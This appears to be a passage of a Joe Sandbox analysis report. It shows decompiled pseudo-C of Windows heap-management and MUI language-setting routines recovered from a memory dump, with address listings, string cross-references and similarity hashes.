									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x34f46960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E34E4B910();
											} else {
												E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E34E4B910();
											__eflags =  *0x34f45da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E34F0FC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E34F15FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									L34E60B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							E34E6096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							L34E60B10(_t547, _v60, _v24);
							_t274 = E34E63C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = E34E63C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E34F0F058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = E34E63C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = E34E63C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E34E4FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = E34E63C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E34F0F13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E34E61EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						L34E60B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E34E4F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}

0x34e4f113
0x34e4f120
0x34e4f123
0x34e4f127
0x34e4f137
0x34e4f13b
0x34eadc64
0x34eadc67
0x34e4f1d5
0x34e4f1d5
0x34e4f1c7
0x34e4f1cd
0x34e4f1cd
0x34e4f144
0x34eadc75
0x34eadc79
0x34eadc7b
0x34eadc8d
0x34eadc92
0x34eadc94
0x34eadc9a
0x34eadc9a
0x34eadc9a
0x34eadc9a
0x34eadc94
0x34eadca0
0x34eadca3
0x34eadca5
0x34e4f202
0x34e4f202
0x34e4f205
0x34e4f207
0x34eadcae
0x34e4f20d
0x34e4f21b
0x34e4f21b
0x34e4f21b
0x34e4f228
0x34e4f22a
0x34e4f22e
0x34e4f231
0x34e4f23f
0x34e4f243
0x34e4f248
0x34e4f24f
0x34e4f256
0x34e4f259
0x34e4f263
0x34e4f269
0x34e4f26f
0x34e4f275
0x34e4f278
0x34e4f27d
0x34e4f45b
0x34e4f461
0x34e4f461
0x34e4f283
0x34e4f28d
0x34e4f291
0x34e4f292
0x34e4f295
0x34e4f3be
0x34e4f3be
0x34e4f3be
0x34e4f29d
0x34e4f2a1
0x34e4f494
0x34e4f498
0x34e4f49d
0x34e4f4a1
0x34e4f4a5
0x34eadcb5
0x34eadcb7
0x00000000
0x00000000
0x34eadcbd
0x34e4f4ab
0x34e4f4b2
0x34eadcc2
0x34eadcc4
0x34eadcca
0x34eadcd0
0x34eadcd4
0x34eadcf3
0x34eadcf8
0x34eadcd6
0x34eadceb
0x34eadcf0
0x34eadcfe
0x34eadd03
0x34eadd08
0x34eadd10
0x34eadd12
0x34eadd17
0x34eadd17
0x34eadd1c
0x34eadd20
0x34eadd20
0x34eadcc4
0x34e4f4b8
0x34e4f4be
0x34e4f4c1
0x34e4f4c5
0x34e4f4c7
0x34e4f4cb
0x34e4f4cd
0x34eadd28
0x34eadd28
0x34e4f4d9
0x34e4f4d9
0x34e4f4dd
0x34e4f4e1
0x34eadd30
0x34eadd37
0x00000000
0x00000000
0x34eadd3d
0x34eae0fe
0x34eae0fe
0x00000000
0x00000000
0x34eae104
0x34eae10a
0x34eae10e
0x34eae12d
0x34eae132
0x34eae110
0x34eae125
0x34eae12a
0x34eae138
0x34eae13d
0x34eae142
0x34eae14a
0x34eae14c
0x34eae151
0x34eae151
0x00000000
0x34e4f4e7
0x34e4f4f5
0x34e4f4fa
0x34e4f4fc
0x34eadd44
0x34eadd44
0x34eadd4a
0x34eadd4f
0x34eae159
0x34eae159
0x34e4f1d2
0x34e4f1d2
0x34e4f1d4
0x34e4f1d4
0x00000000
0x34e4f1d4
0x34eadd6d
0x34eae156
0x34eae156
0x00000000
0x34eae156
0x34e4f502
0x34e4f507
0x34e4f50c
0x34e4f50e
0x34eadd80
0x34e4f514
0x34e4f514
0x34e4f514
0x34e4f516
0x34e4f519
0x34eadd8a
0x34eadd90
0x34eadd97
0x34eadda9
0x34eadda9
0x34eadd97
0x34e4f51f
0x34e4f523
0x34e4f529
0x34e4f52c
0x34e4f532
0x34eaddb3
0x34eaddb3
0x34e4f53c
0x34e4f541
0x34e4f54b
0x34e4f550
0x34e4f55c
0x34e4f563
0x34e4f56d
0x34e4f570
0x34e4f575
0x34e4f577
0x34e4f577
0x34e4f577
0x34e4f577
0x34e4f57d
0x34e4f582
0x34eaddc2
0x34eaddca
0x34eaddce
0x34eaddda
0x34eaddde
0x34eadeaf
0x34eadeb3
0x34eadec1
0x34eadec7
0x34eadec7
0x34eadde4
0x34eadde8
0x34eaddea
0x34eadded
0x34eaddf7
0x34eaddfa
0x34eaddfc
0x34eade02
0x34eade08
0x34eade0a
0x34eade0d
0x34eade0f
0x34eade15
0x34eade18
0x34eade37
0x34eade3c
0x34eade1a
0x34eade2f
0x34eade34
0x34eade42
0x34eade47
0x34eade4d
0x34eade53
0x34eade55
0x34eade5a
0x34eade5a
0x34eade5f
0x34eade5f
0x34eade0d
0x34eade63
0x34eade66
0x34eade69
0x34eade72
0x34eade73
0x34eade77
0x34eade7c
0x34eade7e
0x34eade7f
0x34eade80
0x34eade81
0x34eade87
0x34eade88
0x34eade8d
0x34eade91
0x34eade91
0x34eade95
0x34eade95
0x34eade9d
0x34eadea0
0x34eadea5
0x34eadea5
0x34eaddde
0x34e4f588
0x34e4f58d
0x34e4f58f
0x34eaded7
0x34e4f595
0x34e4f595
0x34e4f595
0x34e4f597
0x34e4f59a
0x34eadee1
0x34eadeea
0x34eadef0
0x34eadefb
0x34eadefd
0x34eadf08
0x34eadf08
0x34eadf08
0x34eadf2b
0x34eadf2b
0x34eadef0
0x34e4f5a0
0x34e4f5a5
0x34e4f5aa
0x34e4f5af
0x34e4f5b1
0x34eadf3e
0x34e4f5b7
0x34e4f5b7
0x34e4f5b7
0x34e4f5b9
0x34e4f5bc
0x34eadf4a
0x34eadf4c
0x34eadf57
0x34eadf57
0x34eadf57
0x34eadf5c
0x34eadf5d
0x34eadf61
0x34eadf7c
0x34eadf88
0x34eadf89
0x34eadf8d
0x34eadf8d
0x00000000
0x34e4f5bc
0x34e4f4e1
0x34e4f2a7
0x34e4f2ad
0x34e4f2b6
0x34e4f2ba
0x34e4f2bc
0x34eadf97
0x34eadf9d
0x34eadf9d
0x34e4f2c4
0x34e4f2c7
0x34e4f2cb
0x34e4f2cd
0x34e4f2d2
0x34e4f2d6
0x34e4f3c8
0x34e4f3c8
0x34e4f2dc
0x34e4f2e1
0x34e4f2e3
0x34eae0ed
0x34eae0f3
0x00000000
0x00000000
0x34eae0f9
0x00000000
0x34eae0f9
0x34e4f2e9
0x34e4f2eb
0x34e4f2ef
0x34e4f2f3
0x34e4f302
0x34e4f302
0x34e4f304
0x34e4f346
0x34e4f346
0x34e4f348
0x34e4f34c
0x34e4f3ea
0x34e4f3f2
0x34e4f3f6
0x34e4f402
0x34e4f406
0x34eae046
0x34eae049
0x34eae057
0x34eae05d
0x34eae05d
0x34e4f40c
0x34e4f410
0x34e4f413
0x34e4f423
0x34e4f426
0x34e4f428
0x34e4f42e
0x34e4f434
0x34eadfe4
0x34eadfe7
0x34eadfed
0x34eadff3
0x34eadff6
0x34eae015
0x34eae01a
0x34eadff8
0x34eae00d
0x34eae012
0x34eae020
0x34eae025
0x34eae02b
0x34eae031
0x34eae033
0x34eae038
0x34eae038
0x34eae03d
0x34eae03d
0x34eadfe7
0x34e4f43a
0x34e4f43d
0x34e4f440
0x34e4f442
0x34e4f470
0x34e4f471
0x34e4f475
0x34e4f47a
0x34e4f47c
0x34e4f47d
0x34e4f47e
0x34e4f47f
0x34e4f482
0x34e4f483
0x34e4f488
0x34e4f48c
0x34e4f48c
0x34e4f444
0x34e4f444
0x34e4f444
0x34e4f446
0x34e4f451
0x34e4f451
0x34e4f406
0x34e4f36b
0x34e4f37a
0x34e4f37f
0x34e4f384
0x34e4f389
0x34e4f38b
0x34eae06d
0x34e4f391
0x34e4f391
0x34e4f391
0x34e4f393
0x34e4f396
0x34eae077
0x34eae080
0x34eae086
0x34eae091
0x34eae093
0x34eae09e
0x34eae09e
0x34eae09e
0x34eae0bb
0x34eae0bb
0x34eae086
0x34e4f39c
0x34e4f3a1
0x34e4f3a6
0x34e4f3a8
0x34eae0ce
0x34e4f3ae
0x34e4f3ae
0x34e4f3ae
0x34e4f3b0
0x34e4f3b3
0x00000000
0x34e4f3b9
0x34eae0dd
0x34eae0df
0x34eadf70
0x34eadf70
0x34eadf70
0x34eadf79
0x34eadf7a
0x34eadf7b
0x00000000
0x34eadf7b
0x34e4f3b3
0x34e4f306
0x34e4f31a
0x34e4f31f
0x34e4f321
0x00000000
0x00000000
0x34e4f327
0x34e4f32c
0x34e4f32e
0x34eadfaf
0x34e4f334
0x34e4f334
0x34e4f334
0x34e4f339
0x34e4f33c
0x34eadfb9
0x34eadfc2
0x34eadfc8
0x34eadfda
0x34eadfda
0x34eadfc8
0x34e4f342
0x00000000
0x34e4f342
0x34e4f2f9
0x34e4f2fc
0x34e4f3d0
0x34e4f3d2
0x00000000
0x00000000
0x34e4f3d8
0x34e4f3db
0x00000000
0x34e4f3e1
0x00000000
0x34e4f3e1
0x34e4f3db
0x00000000
0x34e4f2fc
0x34e4f14a
0x34e4f150
0x34eadc6e
0x00000000
0x34eadc6e
0x34e4f159
0x34e4f15b
0x34e4f162
0x34e4f1d0
0x00000000
0x34e4f17b
0x34e4f184
0x34e4f189
0x34e4f18c
0x34e4f18e
0x34e4f19e
0x00000000
0x34e4f1a0
0x34e4f1a3
0x34e4f1b1
0x34e4f1ba
0x34e4f1be
0x34e4f1c5
0x34e4f1dc
0x34e4f1e4
0x34e4f1e9
0x34e4f1eb
0x34e4f1ef
0x34e4f1f4
0x34e4f1fa
0x34e4f1fa
0x34e4f1eb
0x00000000
0x34e4f1c5
0x34e4f19e

Strings

(!TrailingUCR), xrefs: 34EAE138
(UCRBlock != NULL), xrefs: 34EADCFE
HEAP: , xrefs: 34EADCF3, 34EADE37, 34EAE015, 34EAE12D
HEAP[%wZ]: , xrefs: 34EADCE6, 34EADE2A, 34EAE008, 34EAE120
(LONG)FreeEntry->Size > 1, xrefs: 34EAE020
((LONG)FreeEntry->Size > 1), xrefs: 34EADE42

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: bdd7d68f5082ca9a8b1aaad4c11e5acc4534b95cdcab48db6a02882531a18791
Instruction ID: d333c85a3df1c4955336c57bdbb2aeda6176ab2623f46b69790f8f7ce63a13d8
Opcode Fuzzy Hash: bdd7d68f5082ca9a8b1aaad4c11e5acc4534b95cdcab48db6a02882531a18791
Instruction Fuzzy Hash: C042DF75618381DFE305CF68D884A6ABBE6FF84B48F0449ADE4858B352DB34E941CB52

Uniqueness

Uniqueness Score: -1.00%

Function 34E7510F Relevance: 7.9, Strings: 6, Instructions: 434
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E34E7510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(L34E78BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(L34E78BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(L34E78BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(L34E78BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(L34E78BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E34E65D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E34E988C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E34E9A8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E34E95050(0,  &_v68, _t170);
									_t86 =  &_v24; // 0x34e72e68
									if(E34E756E0( &_v68, _t86) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E34E95050(_t257,  &_v68, _t243);
								_t80 =  &_v24; // 0x34e72e68
								if(E34E756E0( &_v68, _t80) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E34E9A8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E34E65D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E34E988C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E34E9A8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E34E95050(_t262,  &_v68, _t244);
								_t125 =  &_v24; // 0x34e72e68
								if(E34E756E0( &_v68, _t125) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E34E9A8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E34E95050(_t262,  &_v68, _t201);
							_t58 =  &_v24; // 0x34e72e68
							if(E34E756E0( &_v68, _t58) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E34E65D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E34E988C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E34E9A8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E34E95050(_t267,  &_v68, _t245);
							_t117 =  &_v24; // 0x34e72e68
							if(E34E756E0( &_v68, _t117) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E34E9A8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E34E95050(_t267,  &_v68, _t224);
						_t35 =  &_v24; // 0x34e72e68
						if(E34E756E0( &_v68, _t35) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x34e75117
0x34e7511d
0x34e7511f
0x34e75121
0x34e75124
0x34e75127
0x34e7512a
0x34e7512d
0x34e75130
0x34e75133
0x34e75136
0x34e7513a
0x34e7513c
0x34e75141
0x34ebb9ab
0x34ebb9b0
0x34e75460
0x34e75463
0x34e75469
0x34e7546f
0x34e75475
0x34e7547b
0x34e75481
0x34e75484
0x34e7548a
0x34e75491
0x34e75496
0x34e75496
0x34e7515e
0x34ebb9b7
0x34ebb9c1
0x34ebb9d0
0x34ebb9d0
0x34ebb9d5
0x34ebb9d5
0x34e7517b
0x34e7518a
0x34e75190
0x34e75195
0x34e75195
0x34e751af
0x34e7526f
0x34e75286
0x34e75348
0x34e7535f
0x34e75446
0x34e75446
0x34e75449
0x34e75449
0x34e7544b
0x34e7544f
0x34ebbae9
0x34ebbae9
0x34e75455
0x34e7545a
0x34ebbaf5
0x34ebbb08
0x34ebbb0f
0x34ebbb11
0x34ebbb14
0x34ebbb14
0x34ebbaf5
0x00000000
0x34e7545a
0x34e75368
0x34e75368
0x34e7536b
0x34e75370
0x34ebbaa5
0x34ebbaa7
0x34e75376
0x34e75387
0x34e75389
0x34e7538c
0x34e7538c
0x34e75391
0x34ebbaaf
0x34ebbab2
0x00000000
0x34e75397
0x34e7539c
0x34e753a4
0x34e753b2
0x34e753b5
0x34e753b8
0x34e753fc
0x34e753fc
0x34e75404
0x34e7540b
0x34e75410
0x34e7541f
0x34e75421
0x34e75421
0x34e7541f
0x34e75424
0x34ebbabf
0x34ebbacc
0x34ebbad1
0x34ebbad4
0x34e7542a
0x34e7542a
0x34e7542a
0x34e7542c
0x34e75431
0x34e7543e
0x34e7543e
0x34e75443
0x00000000
0x34e75443
0x34e753ba
0x34e753bd
0x34e753bf
0x34e753c2
0x34e753ca
0x34e753cf
0x34e753de
0x34e753e0
0x34e753e0
0x34e753e7
0x34e753ee
0x34e753f1
0x34e753f2
0x34e753f6
0x34e753f9
0x00000000
0x34e753f9
0x34e75391
0x34e7528f
0x34e7528f
0x34e75292
0x34e75297
0x34ebba41
0x34ebba43
0x34e7529d
0x34e752ae
0x34e752b0
0x34e752b3
0x34e752b3
0x34e752b8
0x34ebba4b
0x34ebba4e
0x00000000
0x34e752be
0x34e752c3
0x34e752c8
0x34e752cb
0x34e752ce
0x34e752dd
0x34e752e0
0x34e752e3
0x34ebba58
0x34ebba5b
0x34ebba5d
0x34ebba60
0x34ebba68
0x34ebba6d
0x34ebba7c
0x34ebba7e
0x34ebba7e
0x34ebba85
0x34ebba8c
0x34ebba8f
0x34ebba90
0x34ebba94
0x34ebba97
0x34ebba97
0x34e752e9
0x34e752ec
0x34e752f1
0x34e752f8
0x34e752fd
0x34e7530c
0x34ebba9f
0x34ebba9f
0x34e7530c
0x34e75314
0x34e75323
0x34e75328
0x34e7532b
0x34e7532b
0x34e7532e
0x34e75333
0x34e75340
0x34e75340
0x34e75345
0x00000000
0x34e75345
0x34e752b8
0x34e751b8
0x34e751b8
0x34e751bb
0x34e751c0
0x34ebb9dd
0x34e751c6
0x34e751d2
0x34e751d7
0x34e751d9
0x34e751dc
0x34e751dc
0x34e751e1
0x34ebb9e5
0x34ebb9e7
0x34ebb9ec
0x00000000
0x34e751e7
0x34e751ec
0x34e751f1
0x34e751f4
0x34e75204
0x34e75207
0x34e7520a
0x34ebb9f4
0x34ebb9f7
0x34ebb9f9
0x34ebb9fc
0x34ebba04
0x34ebba09
0x34ebba18
0x34ebba1a
0x34ebba1a
0x34ebba21
0x34ebba28
0x34ebba2b
0x34ebba2c
0x34ebba30
0x34ebba33
0x34ebba33
0x34e75210
0x34e75213
0x34e75218
0x34e7521f
0x34e75224
0x34e75233
0x34ebba3b
0x34ebba3b
0x34e75233
0x34e7523b
0x34e7524a
0x34e7524f
0x34e75252
0x34e75252
0x34e75255
0x34e7525a
0x34e75267
0x34e75267
0x34e7526c
0x00000000
0x34e7526c

Strings

h.4, xrefs: 34E75410, 34E753CF, 34EBBA6D, 34E752FD, 34EBBA09, 34E75224, 34E75227, 34E75300, 34E753D2, 34E75413, 34EBBA0C, 34EBBA70
Kernel-MUI-Language-SKU, xrefs: 34E7534B
Kernel-MUI-Number-Allowed, xrefs: 34E75167
Kernel-MUI-Language-Disallowed, xrefs: 34E75272
WindowsExcludedProcs, xrefs: 34E7514A
Kernel-MUI-Language-Allowed, xrefs: 34E7519B

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.4
API String ID: 0-327953523
Opcode ID: 5766f4c98e43ce4c618af59775c0136fb0c568bf028175c6fbd7c6060b2560ef
Instruction ID: 55b611ac45d3d4ad10104d756461fe342633dc568672880529bb00351ae24813
Opcode Fuzzy Hash: 5766f4c98e43ce4c618af59775c0136fb0c568bf028175c6fbd7c6060b2560ef
Instruction Fuzzy Hash: 15F14CB6D10219EFDB51DF98C980ADEBBFCFF08664F50406AE511A7650EB749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 34E6B0D0 Relevance: 7.8, Strings: 6, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E34E6B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
